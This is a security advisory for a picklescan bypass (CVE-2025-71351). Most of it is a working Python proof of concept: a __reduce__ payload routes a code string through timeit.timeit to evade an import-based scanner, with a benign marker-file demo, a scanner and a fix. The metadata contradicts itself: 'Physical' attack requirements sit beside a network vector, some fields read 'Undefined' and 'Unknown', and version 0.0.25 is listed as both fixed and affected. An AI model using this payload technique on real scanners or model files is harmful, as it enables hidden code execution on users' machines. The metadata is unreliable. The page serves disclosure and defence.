Remote Code Execution Vulnerability in Picklescan by M. Maitre
CVE-2025-71351

7.6 HIGH

Key Information:

Vendor

Picklescan

CVE Published:
21 June 2026

What is CVE-2025-71351?

Picklescan before version 0.0.25 can be bypassed by a crafted pickle file, allowing arbitrary code execution when that file is loaded. The scanner judges a pickle by the globals it imports (GLOBAL and STACK_GLOBAL opcodes) against a list of known-unsafe callables, and timeit.timeit was not treated as unsafe. Because timeit.timeit() compiles and exec()s the statement string it is given, an object whose __reduce__ returns timeit.timeit together with a statement such as "import os; os.system(...)" is reported clean, yet the embedded command runs as soon as the pickle is unpickled (for example, when a model file is loaded). The pickle itself never references 'os'; the import happens inside the string, where an import-based scanner cannot see it. Users should upgrade to the latest version.
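The bypass described above, as an added example that is not part of this advisory and not picklescan's own code: a class whose __reduce__ hands the unpickler timeit.timeit with a statement string, next to a minimal opcode-level scanner of the kind the advisory describes. The denylists, the function names and the marker-file payload are assumptions made for this example; the real tool's unsafe-globals list and API differ. The statement is a benign file write standing in for the os.system() call an attacker would use.

```python
"""timeit.timeit() pickle bypass: build the payload, scan it, load it.

Everything here is an illustrative re-implementation for this example, not
picklescan's code: NAIVE_DENYLIST is an assumed list of flagged modules, and
imported_globals() is a minimal "which globals does this pickle import?" walker.
"""
import os
import pickle
import tempfile
import time
import timeit
from pickletools import genops, markobject

# Assumed denylists for this example (not picklescan's real list).
NAIVE_DENYLIST = {"os", "subprocess", "sys", "builtins", "socket", "shutil"}
FIXED_DENYLIST = NAIVE_DENYLIST | {"timeit"}   # the fix: treat timeit as unsafe


class TimeitPayload:
    """Pickles into a call of timeit.timeit(stmt, "pass", time.perf_counter, 1).

    timeit compiles and exec()s the statement string, so whatever source is in
    `stmt` runs at load time.  The pickle only references timeit.timeit and
    time.perf_counter; the `import os` lives inside the string.
    """

    def __init__(self, stmt: str):
        self.stmt = stmt

    def __reduce__(self):
        # Positional args: stmt, setup, timer, number.  number=1 runs it once.
        return (timeit.timeit, (self.stmt, "pass", time.perf_counter, 1))


def build_pickle(stmt: str) -> bytes:
    return pickle.dumps(TimeitPayload(stmt), protocol=4)


MARK = object()  # sentinel standing in for the pickle VM's mark object


def imported_globals(data: bytes) -> list[tuple[str, str]]:
    """Return every (module, name) resolved through GLOBAL or STACK_GLOBAL.

    A small stack/memo simulation is needed: with protocol 4 the module and
    attribute names can arrive as memo references (BINGET) instead of inline
    strings, e.g. when module and function are both called "timeit".
    """
    stack, memo, found = [], {}, []
    for op, arg, _pos in genops(data):
        if op.name == "GLOBAL":                   # protocol <= 3: "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
            stack.append(("global", module, name))
        elif op.name == "STACK_GLOBAL":           # protocol >= 4: names on the stack
            name, module = stack.pop(), stack.pop()
            found.append((module, name))
            stack.append(("global", module, name))
        elif op.name == "MEMOIZE":
            memo[len(memo)] = stack[-1]
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = stack[-1]
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            stack.append(memo[arg])
        elif op.name == "MARK":
            stack.append(MARK)
        else:
            before = op.stack_before
            marks = [i for i, s in enumerate(before) if s is markobject]
            if marks:                             # op consumes a slice up to the mark
                while stack.pop() is not MARK:
                    pass
                del stack[len(stack) - marks[0]:]  # plus any operands below the mark
            else:
                del stack[len(stack) - len(before):]
            for _ in op.stack_after:              # string opcodes push their text
                stack.append(arg if isinstance(arg, str) else None)
    return found


def scan(data: bytes, denylist: set[str]) -> list[str]:
    """Flag every imported global whose module or dotted name is denylisted."""
    return [f"{m}.{n}" for m, n in imported_globals(data)
            if m in denylist or f"{m}.{n}" in denylist]


def demo() -> dict:
    """Build a pickle with a benign marker-writing statement, scan it both ways, load it."""
    marker = os.path.join(tempfile.mkdtemp(), "loaded.txt")
    # Constructed benign stand-in for the attacker's os.system(...) statement.
    data = build_pickle(f"import os; open({marker!r}, 'w').write('payload ran')")
    result = {
        "globals": imported_globals(data),
        "naive": scan(data, NAIVE_DENYLIST),      # [] : the bypass
        "fixed": scan(data, FIXED_DENYLIST),      # ['timeit.timeit']
        "existed_before_load": os.path.exists(marker),
    }
    pickle.loads(data)                            # this executes the statement
    with open(marker) as fh:
        result["marker"] = fh.read()
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the module shows the naive list reporting nothing while the list that includes timeit flags timeit.timeit, and then loads the pickle so the marker file appears. Two points carry over to any scanner of this kind: a callable that exec()s or eval()s a string argument (timeit.timeit and timeit.repeat are the same Timer under the hood) is as dangerous as os.system and belongs on the unsafe list, and the opcode walker must resolve memo references, because a repeated name such as "timeit" may be emitted as a BINGET rather than a second inline string.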

Affected Version(s)

picklescan >= 0, < 0.0.25

picklescan 0.0.25

CVSS v4

Score: 7.6
Severity: HIGH
Confidentiality: High
Integrity: High
Availability: None
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: Physical
Privileges Required: Undefined
User Interaction: Unknown


Credit

SeaW1nd